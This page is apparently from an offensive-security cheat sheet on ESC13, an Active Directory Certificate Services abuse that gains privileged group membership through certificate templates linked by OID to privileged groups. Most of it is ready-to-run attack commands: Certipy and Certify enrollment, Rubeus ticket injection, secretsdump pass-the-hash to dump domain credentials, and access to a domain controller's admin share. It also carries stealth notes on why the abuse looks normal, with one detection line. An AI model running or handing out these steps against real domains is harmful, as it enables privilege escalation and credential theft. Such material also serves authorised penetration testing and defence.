🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC13

ADCSESC13

ESC13: OID group link (msDS-OIDToGroupLink) β€” enroll in a template whose issuance policy OID is linked to a privileged AD group; authenticating with the issued cert grants membership in that group for the duration of the logon session.

Applies to: Users/Computers with Enroll rights β†’ certificate template with issuance policy linked to a privileged group via msDS-OIDToGroupLink β†’ Enterprise CA

Linux Abuse

certipy-ad

# Step 1: Find vulnerable templates with OID group links
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Look for templates where "Group" appears in the output β€” this is the linked privileged group

# Step 2: Enroll in the ESC13-vulnerable template
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>'
# Output: <username>.pfx

# Step 3: Authenticate β€” the resulting TGT/session will include the linked group membership
certipy-ad auth -pfx <username>.pfx -dc-ip <dc-ip>
# Returns NT hash; the LDAP session / TGT will have the OID-linked group in the PAC

# Step 4: Use the hash with tools that respect group membership from PKINIT
# Pass-the-hash for LDAP access (the group membership is in the Kerberos PAC)
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<dc-ip>'

# Or use the TGT directly for services where group membership matters
export KRB5CCNAME=<username>.ccache
klist

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find templates with OID group links
Certify.exe find /vulnerable

# Step 2: Enroll in ESC13 template
Certify.exe request /ca:<ca-host>\<ca> /template:<template>

# Step 3: Request TGT β€” PAC will contain the linked group's SID
Rubeus.exe asktgt /user:<username> /domain:<domain> /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Step 4: Verify group membership in TGT
klist
whoami /groups
# Should show the OID-linked privileged group (e.g., Enterprise Admins, specific admin group)

Understanding the Impact

# Identify which group the OID links to (from certipy find output or BloodHound)
# The linked group is specified in the OID object's msDS-OIDToGroupLink attribute
# Common high-value targets: Domain Admins, Enterprise Admins, custom privileged groups

# After TGT injection, access privileged resources
dir \\<dc-ip>\c$
net use \\<dc-ip>\c$ /user:<domain>\<username>

Opsec

  • Enrollment itself appears as a normal certificate request β€” no anomalous attributes in the cert.
  • The group membership is granted via the Kerberos PAC from PKINIT, not via actual AD group membership.
  • CA retains issued cert in Issued Certificates store.
  • Detection: monitor certificate issuance for templates with OID group links, especially where the enroller is not an expected member of the linked group.